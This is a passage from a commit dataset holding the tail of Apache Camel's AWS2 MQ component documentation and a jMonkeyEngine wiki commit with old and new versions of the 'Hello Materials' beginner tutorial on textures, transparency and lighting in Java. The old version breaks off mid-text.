handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. It can be listBrokers,createBroker,deleteBroker | | MQ2Operations\n| *proxyHost* (producer) | To define a proxy host when instantiating the MQ client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the MQ client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the MQ client | HTTPS | Protocol\n| *region* (producer) | The region in which MQ client needs to work. 
When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\n\/\/ spring-boot-auto-configure options: START\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\nRequired MQ component options\n\nYou have to provide the amazonMqClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/amazon-mq\/[Amazon MQ] service.\n\n== Usage\n\n=== Message headers evaluated by the MQ producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsMQMaxResults` |`String` |The number of results that must be retrieved from listBrokers operation\n\n|`CamelAwsMQBrokerName` |`String` |The broker name\n\n|`CamelAwsMQOperation` |`String` |The operation we want to perform\n\n|`CamelAwsMQBrokerId` |`String` |The broker id\n\n|`CamelAwsMQBrokerDeploymentMode` |`String` |The deployment mode for the broker in the createBroker operation\n\n|`CamelAwsMQBrokerInstanceType` |`String` |The instance type for the MQ machine in the createBroker operation\n\n|`CamelAwsMQBrokerEngine` |`String` |The Broker Engine for MQ. Default is ACTIVEMQ\n\n|`CamelAwsMQBrokerEngineVersion` |`String` |The Broker Engine Version for MQ. Currently you can choose between 5.15.6 and 5.15.0 of ACTIVEMQ\n\n|`CamelAwsMQBrokerUsers` |`List<User>` |The list of users for MQ\n\n|`CamelAwsMQBrokerPubliclyAccessible` |`Boolean` |If the MQ instance must be publicly available or not. 
Default is false.\n|=======================================================================\n\n=== MQ Producer operations\n\nCamel-AWS MQ component provides the following operation on the producer side:\n\n- listBrokers\n- createBroker\n- deleteBroker\n- rebootBroker\n- updateBroker\n- describeBroker\n\n== Producer Examples\n\n- listBrokers: this operation will list the available MQ Brokers in AWS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listBrokers\")\n .to(\"aws2-mq:\/\/test?amazonMqClient=#amazonMqClient&operation=listBrokers\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of MqClient client in registry\n\nThe component is capable of detecting the presence of an MqClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\nDependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-mq<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3113dee08cc72152ab717ba716b3c809a170cde1","subject":"remove link","message":"remove link\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/tutorials\/pages\/beginner\/hello_material.adoc","new_file":"docs\/modules\/tutorials\/pages\/beginner\/hello_material.adoc","new_contents":"= jMonkeyEngine 3 Tutorial (6) - Hello Materials\n:author:\n:revnumber:\n:revdate: 2020\/07\/06\n:keywords: documentation, beginner, intro, model, material, color, texture, transparency\n\n\nThe term Material includes everything that influences what the surface of a 3D model looks like: The color, texture, shininess, and opacity\/transparency. Plain coloring is covered in xref:beginner\/hello_node.adoc[Hello Node]. Loading models that come with materials is covered in xref:beginner\/hello_asset.adoc[Hello Asset]. In this tutorial you learn to create and use custom JME3 Material Definitions.\n\nimage::beginner\/beginner-materials.png[beginner-materials.png,320,240,align=\"center\"]\n\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select menu:Properties[Libraries > Add Library], and add the \"`jme3-test-data`\" library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.light.DirectionalLight;\nimport com.jme3.material.Material;\nimport com.jme3.material.RenderState.BlendMode;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.math.Vector3f;\nimport com.jme3.renderer.queue.RenderQueue.Bucket;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.scene.shape.Sphere;\nimport com.jme3.texture.Texture;\nimport com.jme3.util.TangentBinormalGenerator;\n\n\/** Sample 6 - how to give an object's surface a material and texture.\n * How to make objects transparent. 
How to make bumpy and shiny surfaces. *\/\npublic class HelloMaterial extends SimpleApplication {\n\n public static void main(String[] args) {\n HelloMaterial app = new HelloMaterial();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n\n \/** A simple textured cube -- in good MIP map quality. *\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha);\n cube2Geo.setQueueBucket(Bucket.Transparent);\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n \/** A bumpy rock with a shiny light effect.*\/\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected); \/\/ better quality on spheres\n TangentBinormalGenerator.generate(sphereMesh); \/\/ for lighting effect\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n sphereMat.setTexture(\"NormalMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White);\n sphereMat.setColor(\"Specular\",ColorRGBA.White);\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [0,128]\n sphereGeo.setMaterial(sphereMat);\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n\n \/** Must add a light to make the lit object visible! *\/\n DirectionalLight sun = new DirectionalLight();\n sun.setDirection(new Vector3f(1,0,-2).normalizeLocal());\n sun.setColor(ColorRGBA.White);\n rootNode.addLight(sun);\n\n }\n}\n\n----\n\nYou should see\n\n* Left \u2013 A cube with a brown monkey texture.\n* Right \u2013 A translucent monkey picture in front of a shiny bumpy rock.\n\nMove around with the WASD keys to have a closer look at the translucency, and the rock's bumpiness.\n\n\n== Simple Unshaded Texture\n\nTypically you want to give objects in your scene textures: It can be rock, grass, brick, wood, water, metal, paper\u2026 A texture is a normal image file in JPG or PNG format. In this example, you create a box with a simple unshaded Monkey texture as material.\n\n[source,java]\n----\n\n \/** A simple textured cube -- in good MIP map quality. 
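Mip maps are precomputed, scaled-down copies of the texture that keep it looking smooth at a distance. 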
*\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n----\n\nHere is what we did to create a textured box:\n\n. Create a Geometry `cube1Geo` from a Box mesh `cube1Mesh`.\n. Create a Material `cube1Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube1Tex` from the `Monkey.jpg` file in the `assets\/Interface\/Logo\/` directory of the project.\n. Load the texture `cube1Tex` into the `ColorMap` layer of the material `cube1Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n== Transparent Unshaded Texture\n\n`Monkey.png` is the same texture as `Monkey.jpg`, but with an added alpha channel. The alpha channel allows you to specify which areas of the texture you want to be opaque or transparent: Black areas of the alpha channel remain opaque, gray areas become translucent, and white areas become transparent.\n\nFor a partially translucent\/transparent texture, you need:\n\n* A Texture with alpha channel\n* A Texture with blend mode of `BlendMode.Alpha`\n* A Geometry in the `Bucket.Transparent` render bucket. +\nThis bucket ensures that the transparent object is drawn on top of objects behind it, and they show up correctly under the transparent parts.\n\n[source,java]\n----\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha); \/\/ !\n cube2Geo.setQueueBucket(Bucket.Transparent); \/\/ !\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n----\n\nFor non-transparent objects, the drawing order is not so important, because the z-buffer already keeps track of whether a pixel is behind something else or not, and the color of an opaque pixel doesn't depend on the pixels under it. This is why opaque Geometries can be drawn in any order.\n\nWhat you did for the transparent texture is the same as before, with only one added step for the transparency.\n\n. Create a Geometry `cube2Geo` from a Box mesh `cube2Mesh`. This Box Geometry is a flat upright box (because z=0.01f).\n. Create a Material `cube2Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube2Tex` from the `Monkey.png` file in the `assets\/Textures\/ColoredTex\/` directory of the project. This PNG file must have an alpha layer.\n. *Activate transparency in the material by setting the blend mode to Alpha.*\n. *Set the QueueBucket of the Geometry to `Bucket.Transparent`.*\n. Load the texture `cube2Tex` into the `ColorMap` layer of the material `cube2Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n\n[TIP]\n====\nLearn more about creating PNG images with an alpha layer in the help system of your graphic editor.\n====\n\n
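Transparency does not require a texture at all. The following sketch (not part of the original sample; it assumes `geo` is an existing Geometry) combines the same blend mode and render bucket with a plain color whose fourth (alpha) component makes it half-transparent:\n\n[source,java]\n----\n\n Material mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat.setColor(\"Color\", new ColorRGBA(1f, 1f, 1f, 0.5f)); \/\/ half-transparent white\n mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha);\n geo.setQueueBucket(Bucket.Transparent);\n geo.setMaterial(mat);\n\n----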
\n\n== Shininess and Bumpiness\n\nBut textures are not all. Have a close look at the shiny sphere \u2013 you cannot get such a nice bumpy material with just a plain texture. You see that JME3 also supports so-called Phong-illuminated materials:\n\nIn a lit material, the standard texture layer is referred to as _DiffuseMap_; any material can use this layer. A lit material can additionally have lighting effects such as _Shininess_ used together with the _SpecularMap_ layer and _Specular_ color. And you can even get a realistically bumpy or cracked surface with the help of the _NormalMap_ layer.\n\nLet's have a look at the part of the code example where you create the shiny bumpy rock.\n\n. Create a Geometry from a Sphere shape. Note that this shape is a normal smooth sphere mesh.\n+\n[source,java]\n----\n\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n----\n\n.. (Only for Spheres) Change the sphere's TextureMode to make the square texture project better onto the sphere.\n+\n[source,java]\n----\n\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected);\n----\n\n.. You must generate TangentBinormals for the mesh so you can use the NormalMap layer of the texture.\n+\n[source,java]\n----\n\n TangentBinormalGenerator.generate(sphereMesh);\n----\n\n\n. Create a material based on the `Lighting.j3md` default material.\n+\n[source,java]\n----\n\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n----\n\n.. Set a standard rocky texture in the `DiffuseMap` layer.\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond.jpg[Pond.jpg,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n\n----\n\n.. Set the `NormalMap` layer that contains the bumpiness. The NormalMap was generated for this particular DiffuseMap with a special tool (e.g. Blender).\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond_normal.png[Pond_normal.png,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"NormalMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n----\n\n.. Set the Material's Shininess to a value between 1 and 128. For a rock, a low fuzzy shininess is appropriate. Use material colors to define the shiny Specular color.\n+\n[source,java]\n----\n\n sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White); \/\/ minimum material color\n sphereMat.setColor(\"Specular\",ColorRGBA.White); \/\/ for shininess\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [1,128] for shininess\n----\n\n\n. Assign your newly created material to the Geometry.\n+\n[source,java]\n----\n\n sphereGeo.setMaterial(sphereMat);\n----\n\n. Let's move and rotate the geometry a bit to position it better.\n+\n[source,java]\n----\n\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n----\n\n\nRemember that any Lighting.j3md-based material requires a light source, as shown in the full code sample above.\n\n\n\n[TIP]\n====\nTo deactivate Shininess, do not set `Shininess` to 0, but instead set the `Specular` color to `ColorRGBA.Black`.\n====\n\n
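In code, that is a one-line change to the sample above:\n\n[source,java]\n----\n\n sphereMat.setColor(\"Specular\", ColorRGBA.Black); \/\/ no shiny highlight\n----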
\n\n== Default Material Definitions\n\nAs you have seen, you can find the following default materials in `jme\/core-data\/Common\/MatDefs\/\u2026`.\n[cols=\"20,40,40\", options=\"header\"]\n|===\n\na| Default Definition\na| Usage\n<a| Parameters\n\na| `Misc\/Unshaded.j3md`\na| Colored: Use with mat.setColor() and ColorRGBA. +\nTextured: Use with mat.setTexture() and Texture.\na| Color : Color +\nColorMap : Texture2D\n\n<a| `Light\/Lighting.j3md`\na| Use with shiny Textures, Bump- and NormalMaps textures. +\nRequires a light source.\na| Ambient, Diffuse, Specular : Color +\nDiffuseMap, NormalMap, SpecularMap : Texture2D +\nShininess : Float\n\n|===\n\nFor a game, you create custom Materials based on these existing MaterialDefinitions \u2013 as you have just seen in the example with the shiny rock's material.\n\n\n== Exercises\n\n\n=== Exercise 1: Custom .j3m Material\n\nLook at the shiny rocky sphere above again. It takes several lines to create and set the Material.\n\n* Note how it loads the `Lighting.j3md` Material definition.\n* Note how it sets the `DiffuseMap` and `NormalMap` to a texture path.\n* Note how it activates `UseMaterialColors` and sets `Specular` and `Diffuse` to 4 float values (RGBA color).\n* Note how it sets `Shininess` to 64.\n\nIf you want to use one custom material for several models, you can store it in a .j3m file, and save a few lines of code every time.\n\nYou create a j3m file as follows:\n\n. Create a plain text file `assets\/Materials\/MyCustomMaterial.j3m` in your project directory, with the following content:\n+\n[source]\n----\nMaterial My shiny custom material : Common\/MatDefs\/Light\/Lighting.j3md {\n MaterialParameters {\n DiffuseMap : Textures\/Terrain\/Pond\/Pond.jpg\n NormalMap : Textures\/Terrain\/Pond\/Pond_normal.png\n UseMaterialColors : true\n Specular : 1.0 1.0 1.0 1.0\n Diffuse : 1.0 1.0 1.0 1.0\n Shininess : 64.0\n }\n}\n\n----\n\n** Note that `Material` is a fixed keyword.\n** Note that `My shiny custom material` is a String that you can choose to describe the material.\n** Note how the code sets all the same properties as before!\n\n. In the code sample, comment out the eight lines that have `sphereMat` in them.\n. Below this line, add the following line:\n+\n[source,java]\n----\nsphereGeo.setMaterial((Material) assetManager.loadMaterial(\n \"Materials\/MyCustomMaterial.j3m\"));\n\n----\n\n. Run the app. The result is the same.\n\nUsing this new custom material `MyCustomMaterial.j3m` only takes one line. You have replaced the eight lines of an on-the-fly material definition with one line that loads a custom material from a file. Using .j3m files is very handy if you use the same material often.\n\n\n=== Exercise 2: Bumpiness and Shininess\n\nGo back to the bumpy rock sample above:\n\n. Comment out the DiffuseMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. Comment out the NormalMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. 
Change the value of Shininess to values like 0, 63, 127.\n** What aspect of the Shininess changes?\n\n\n\n== Conclusion\n\nYou have learned how to create a Material, specify its properties, and use it on a Geometry. You know how to load an image file (.png, .jpg) as texture into a material. You know to save texture files in a subfolder of your project's `assets\/Textures\/` directory.\n\nYou have also learned that a material can be stored in a .j3m file. The file references a built-in MaterialDefinition and specifies values for properties of that MaterialDefinition. You know to save your custom .j3m files in your project's `assets\/Materials\/` directory.\n\n*See also:*\n\n* xref:ROOT:jme3\/intermediate\/how_to_use_materials.adoc[How to Use Materials]\n* xref:ROOT:sdk\/material_editing.adoc[Material Editing]\n* link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine3-material-system-full-explanation\/12947[Materials] forum thread\n\/\/* link:http:\/\/nbviewer.jupyter.org\/github\/jMonkeyEngine\/wiki\/blob\/master\/src\/docs\/resources\/tutorials\/material\/jME3_materials.pdf[jME3 Materials documentation (PDF)]\n* link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Video Tutorial: Editing and Assigning Materials to Models in jMonkeyEngine SDK (from 2010, is there a newer one?]\n* link:https:\/\/www.blender.org\/support\/tutorials\/[Creating textures in Blender]\n","old_contents":"= jMonkeyEngine 3 Tutorial (6) - Hello Materials\n:author:\n:revnumber:\n:revdate: 2020\/07\/06\n:keywords: documentation, beginner, intro, model, material, color, texture, transparency\n\n\nThe term Material includes everything that influences what the surface of a 3D model looks like: The color, texture, shininess, and opacity\/transparency. Plain coloring is covered in xref:beginner\/hello_node.adoc[Hello Node]. Loading models that come with materials is covered in xref:beginner\/hello_asset.adoc[Hello Asset]. In this tutorial you learn to create and use custom JME3 Material Definitions.\n\nimage::beginner\/beginner-materials.png[beginner-materials.png,320,240,align=\"center\"]\n\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select menu:Properties[Libraries > Add Library], and add the \"`jme3-test-data`\" library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.light.DirectionalLight;\nimport com.jme3.material.Material;\nimport com.jme3.material.RenderState.BlendMode;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.math.Vector3f;\nimport com.jme3.renderer.queue.RenderQueue.Bucket;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.scene.shape.Sphere;\nimport com.jme3.texture.Texture;\nimport com.jme3.util.TangentBinormalGenerator;\n\n\/** Sample 6 - how to give an object's surface a material and texture.\n * How to make objects transparent. How to make bumpy and shiny surfaces. *\/\npublic class HelloMaterial extends SimpleApplication {\n\n public static void main(String[] args) {\n HelloMaterial app = new HelloMaterial();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n\n \/** A simple textured cube -- in good MIP map quality. 
*\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha);\n cube2Geo.setQueueBucket(Bucket.Transparent);\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n \/** A bumpy rock with a shiny light effect.*\/\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected); \/\/ better quality on spheres\n TangentBinormalGenerator.generate(sphereMesh); \/\/ for lighting effect\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n sphereMat.setTexture(\"NormalMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White);\n sphereMat.setColor(\"Specular\",ColorRGBA.White);\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [0,128]\n sphereGeo.setMaterial(sphereMat);\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n\n \/** Must add a light to make the lit object visible! *\/\n DirectionalLight sun = new DirectionalLight();\n sun.setDirection(new Vector3f(1,0,-2).normalizeLocal());\n sun.setColor(ColorRGBA.White);\n rootNode.addLight(sun);\n\n }\n}\n\n----\n\nYou should see\n\n* Left \u2013 A cube with a brown monkey texture.\n* Right \u2013 A translucent monkey picture in front of a shiny bumpy rock.\n\nMove around with the WASD keys to have a closer look at the translucency, and the rock's bumpiness.\n\n\n== Simple Unshaded Texture\n\nTypically you want to give objects in your scene textures: It can be rock, grass, brick, wood, water, metal, paper\u2026 A texture is a normal image file in JPG or PNG format. In this example, you create a box with a simple unshaded Monkey texture as material.\n\n[source,java]\n----\n\n \/** A simple textured cube -- in good MIP map quality. *\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n----\n\nHere is what we did: to create a textured box:\n\n. Create a Geometry `cube1Geo` from a Box mesh `cube1Mesh`.\n. 
Create a Material `cube1Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube1Tex` from the `Monkey.jpg` file in the `assets\/Interface\/Logo\/` directory of the project.\n. Load the texture `cube1Tex` into the `ColorMap` layer of the material `cube1Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n== Transparent Unshaded Texture\n\n`Monkey.png` is the same texture as `Monkey.jpg`, but with an added alpha channel. The alpha channel allows you to specify which areas of the texture you want to be opaque or transparent: Black areas of the alpha channel remain opaque, gray areas become translucent, and white areas become transparent.\n\nFor a partially translucent\/transparent texture, you need:\n\n* A Texture with alpha channel\n* A Texture with blend mode of `BlendMode.Alpha`\n* A Geometry in the `Bucket.Transparent` render bucket. +\nThis bucket ensures that the transparent object is drawn on top of objects behind it, and they show up correctly under the transparent parts.\n\n[source,java]\n----\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha); \/\/ !\n cube2Geo.setQueueBucket(Bucket.Transparent); \/\/ !\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n----\n\nFor non-transparent objects, the drawing order is not so important, because the z-buffer already keeps track of whether a pixel is behind something else or not, and the color of an opaque pixel doesn't depend on the pixels under it, this is why opaque Geometries can be drawn in any order.\n\nWhat you did for the transparent texture is the same as before, with only one added step for the transparency.\n\n. Create a Geometry `cube2Geo` from a Box mesh `cube2Mesh`. This Box Geometry is flat upright box (because z=0.01f).\n. Create a Material `cube2Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube2Tex` from the `Monkey.png` file in the `assets\/Textures\/ColoredTex\/` directory of the project. This PNG file must have an alpha layer.\n. *Activate transparency in the material by setting the blend mode to Alpha.*\n. *Set the QueueBucket of the Geometry to `Bucket.Transparent`.*\n. Load the texture `cube2Tex` into the `ColorMap` layer of the material `cube2Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n\n[TIP]\n====\nLearn more about creating PNG images with an alpha layer in the help system of your graphic editor.\n====\n\n\n\n== Shininess and Bumpiness\n\nBut textures are not all. Have a close look at the shiny sphere \u2013 you cannot get such a nice bumpy material with just a plain texture. You see that JME3 also supports so-called Phong-illuminated materials:\n\nIn a lit material, the standard texture layer is refered to as _DiffuseMap_, any material can use this layer. A lit material can additionally have lighting effects such as _Shininess_ used together with the _SpecularMap_ layer and _Specular_ color. 
And you can even get a realistically bumpy or cracked surface with help of the _NormalMap_ layer.\n\nLet's have a look at the part of the code example where you create the shiny bumpy rock.\n\n. Create a Geometry from a Sphere shape. Note that this shape is a normal smooth sphere mesh.\n+\n[source,java]\n----\n\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n----\n\n.. (Only for Spheres) Change the sphere's TextureMode to make the square texture project better onto the sphere.\n+\n[source,java]\n----\n\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected);\n----\n\n.. You must generate TangentBinormals for the mesh so you can use the NormalMap layer of the texture.\n+\n[source,java]\n----\n\n TangentBinormalGenerator.generate(sphereMesh);\n----\n\n\n. Create a material based on the `Lighting.j3md` default material.\n+\n[source,java]\n----\n\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n----\n\n.. Set a standard rocky texture in the `DiffuseMap` layer.\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond.jpg[Pond.jpg,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n\n----\n\n.. Set the `NormalMap` layer that contains the bumpiness. The NormalMap was generated for this particular DiffuseMap with a special tool (e.g. Blender).\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond_normal.png[Pond_normal.png,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"NormalMap\",\n 